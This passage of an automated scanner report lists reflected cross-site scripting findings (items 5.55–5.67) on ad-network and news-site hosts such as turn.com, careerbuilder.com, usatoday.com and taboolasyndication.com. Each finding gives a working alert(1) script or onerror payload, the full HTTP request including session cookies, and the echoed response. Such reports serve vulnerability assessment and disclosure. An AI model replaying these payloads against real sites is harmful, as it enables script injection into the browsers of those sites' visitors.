5.55. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14a96'%3balert(1)//3dd8151559d was submitted in the admeld_callback parameter. This input was echoed as 14a96';alert(1)//3dd8151559d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /admeld_sync?admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match14a96'%3balert(1)//3dd8151559d HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=e1c22076-53f3-4fd9-8356-2735bf06a66c; segments_p1="eJzjYuHY2M7IxcIx9wojAA9oAtg="; exchange_uid="eyI0IjogWyJDQUVTRVB4NVdCa2dwbTVNQ3pVRHd2TlVDNXciLCA3MzQzODNdfQ=="; partnerUID="eyIxNjkiOiBbIjRlNWUzZjFhZTNmZDc0MjciLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 04 Sep 2011 01:05:16 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sun, 04-Sep-2011 01:04:56 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 247

document.write('<img width="0" height="0" src="http://tag.admeld.com/match14a96';alert(1)//3dd8151559d?admeld_adprovider_id=300&external_user_id=e1c22076-53f3-4fd9-8356-2735bf06a66c&Expiration=1315530316&custom_user_segments=%2C17329%2C27165"/>
...[SNIP]...

5.56. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://premium.mookie1.com
Path:	/2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9782a"><script>alert(1)</script>8fada19613b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.com9782a"><script>alert(1)</script>8fada19613b/ac@Bottom3 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 338
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.com9782a"><script>alert(1)</script>8fada19613b/ac/377283912/Bottom3/default/empty.gif/4d686437616b35697963454144412f72?x" target="_top">
...[SNIP]...

5.57. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://premium.mookie1.com
Path:	/2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a684b"><script>alert(1)</script>4e0d56cffe6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.com/ac@Bottom3a684b"><script>alert(1)</script>4e0d56cffe6 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 329
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.com/ac/86271498/Bottom3a684b"><script>alert(1)</script>4e0d56cffe6/default/empty.gif/4d686437616b35697963454144412f72?x" target="_top">
...[SNIP]...

5.58. http://r.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75258"><script>alert(1)</script>9210644d738 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=75258"><script>alert(1)</script>9210644d738&sp=y&admeld_call_type=iframe&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2420786125005478449; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:01 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:06:01 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2420786125005478449&rnd=4026326661709276972&fpid=75258"><script>alert(1)</script>9210644d738&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.59. http://r.turn.com/server/pixel.htm [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40167"><script>alert(1)</script>eaafdf22b34 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=40167"><script>alert(1)</script>eaafdf22b34&admeld_call_type=iframe&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2420786125005478449; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:02 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:06:01 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2420786125005478449&rnd=4295609569520200019&fpid=4&nu=n&t=&sp=40167"><script>alert(1)</script>eaafdf22b34&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.60. http://rtq.careerbuilder.com/RTQ/jobstream.aspx [lr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rtq.careerbuilder.com
Path:	/RTQ/jobstream.aspx

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f59'%3balert(1)//ef7e95529ce was submitted in the lr parameter. This input was echoed as 69f59';alert(1)//ef7e95529ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /RTQ/jobstream.aspx?lr=CBMC_SB69f59'%3balert(1)//ef7e95529ce&rssid=MC_SB_jbstrm&num=&kw=CustomField3:SACBEETJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[&%20mi_cb_search_box%20&] HTTP/1.1
Host: rtq.careerbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL1
Date: Sun, 04 Sep 2011 00:58:11 GMT
Connection: close
Content-Length: 6632

// declaration
var cb_jobstream_title;
var cb_jobstream_title_bg
var cb_jobstream_title_font
var cb_jobstream_border;
var cb_jobstream_width;
var cb_jobstream_height;
var cb_jobstream_main_bgco
...[SNIP]...
<input type="hidden" name="lr" value="CBMC_SB69f59';alert(1)//ef7e95529ce" />
...[SNIP]...

5.61. http://rtq.careerbuilder.com/RTQ/jobstream.aspx [rssid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rtq.careerbuilder.com
Path:	/RTQ/jobstream.aspx

Issue detail

The value of the rssid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75175'%3balert(1)//9366c27e6c8 was submitted in the rssid parameter. This input was echoed as 75175';alert(1)//9366c27e6c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /RTQ/jobstream.aspx?lr=CBMC_SB&rssid=MC_SB_jbstrm75175'%3balert(1)//9366c27e6c8&num=&kw=CustomField3:SACBEETJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[&%20mi_cb_search_box%20&] HTTP/1.1
Host: rtq.careerbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL52
Date: Sun, 04 Sep 2011 00:58:14 GMT
Connection: close
Content-Length: 6632

// declaration
var cb_jobstream_title;
var cb_jobstream_title_bg
var cb_jobstream_title_font
var cb_jobstream_border;
var cb_jobstream_width;
var cb_jobstream_height;
var cb_jobstream_main_bgco
...[SNIP]...
<input type="hidden" name="siteid=" value="MC_SB_jbstrm75175';alert(1)//9366c27e6c8" />
...[SNIP]...

5.62. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 41775<script>alert(1)</script>674217f51e3 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=545853.blog&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb041775<script>alert(1)</script>674217f51e3 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449799883; path=/
Cache-Control: private
Content-Length: 43049
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm6l3pluckcom
Set-Cookie: SiteLifeHost=gnvm6l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:45:19 GMT
Connection: close

plcb041775<script>alert(1)</script>674217f51e3('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\">
...[SNIP]...

5.63. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkey request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 22e8e><img%20src%3da%20onerror%3dalert(1)>4976d325d44 was submitted in the plckcommentonkey parameter. This input was echoed as 22e8e><img src=a onerror=alert(1)>4976d325d44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=545853.blog22e8e><img%20src%3da%20onerror%3dalert(1)>4976d325d44&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449799883; path=/
Cache-Control: private
Content-Length: 34640
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm6l3pluckcom
Set-Cookie: SiteLifeHost=gnvm6l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:45:09 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_comments_66556\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"545853.blog22e8e><img src=a onerror=alert(1)>4976d325d44\" commentOnKeyType=\"article\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

5.64. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkeytype request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6aaf0><img%20src%3da%20onerror%3dalert(1)>2b3406c2615 was submitted in the plckcommentonkeytype parameter. This input was echoed as 6aaf0><img src=a onerror=alert(1)>2b3406c2615 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article6aaf0><img%20src%3da%20onerror%3dalert(1)>2b3406c2615&plckcommentonkey=545853.blog&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449799883; path=/
Cache-Control: private
Content-Length: 34978
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm6l3pluckcom
Set-Cookie: SiteLifeHost=gnvm6l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:44:59 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
_comments_83406\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"545853.blog\" commentOnKeyType=\"article6aaf0><img src=a onerror=alert(1)>2b3406c2615\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

5.65. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 478ec<script>alert(1)</script>70f21925513 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback478ec<script>alert(1)</script>70f21925513 HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:50:23 GMT
Content-Length: 131
Content-Type: text/html

__nbcsnasadops.doSCallback478ec<script>alert(1)</script>70f21925513({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2"}});

5.66. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sprint.tt.omtrdc.net
Path:	/m2/sprint/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 574f5<script>alert(1)</script>7248981ddd2 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sprint/mbox/standard?mboxHost=www.sprint.com&mboxSession=1315097027971-178294&mboxPage=1315097027971-178294&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=sprint-interstitial-mbox574f5<script>alert(1)</script>7248981ddd2&mboxId=0&mboxTime=1315079036636&mboxURL=http%3A%2F%2Fwww.sprint.com%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&mboxVersion=40 HTTP/1.1
Host: sprint.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315097027971-178294.19; Domain=sprint.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 00:46:21 GMT; Path=/m2/sprint
Content-Type: text/javascript
Content-Length: 220
Date: Sun, 04 Sep 2011 00:46:21 GMT
Server: Test & Target

mboxFactories.get('default').get('sprint-interstitial-mbox574f5<script>alert(1)</script>7248981ddd2',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315097027971-178294.19");

5.67. http://trc.taboolasyndication.com/reuters/trc/2/json [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trc.taboolasyndication.com
Path:	/reuters/trc/2/json

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 28a5e<script>alert(1)</script>85decac219a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reuters/trc/2/json?tim=19%3A44%3A27.751&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=353&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX&llvl=2&item-id=USTRE78222D20110903&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&page-id=6c870e4113048a2a02755a640f72c25ab23ac976&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_128a5e<script>alert(1)</script>85decac219a HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 00:52:30 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097550;Path=/reuters/
Set-Cookie: JSESSIONID=.prod2-f6;Path=/
Set-Cookie: taboola_wv=;Path=/reuters/;Expires=Mon, 03-Sep-12 00:52:30 GMT
Content-Length: 3988

TRC.callbacks.recommendations_128a5e<script>alert(1)</script>85decac219a({"trc":{"req":"89ec6e2f6de78af85a24b9efb3c77a44","session-id":"cf5b371b2ea2c82fafb75969374381dc","session-data":"v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_131
...[SNIP]...

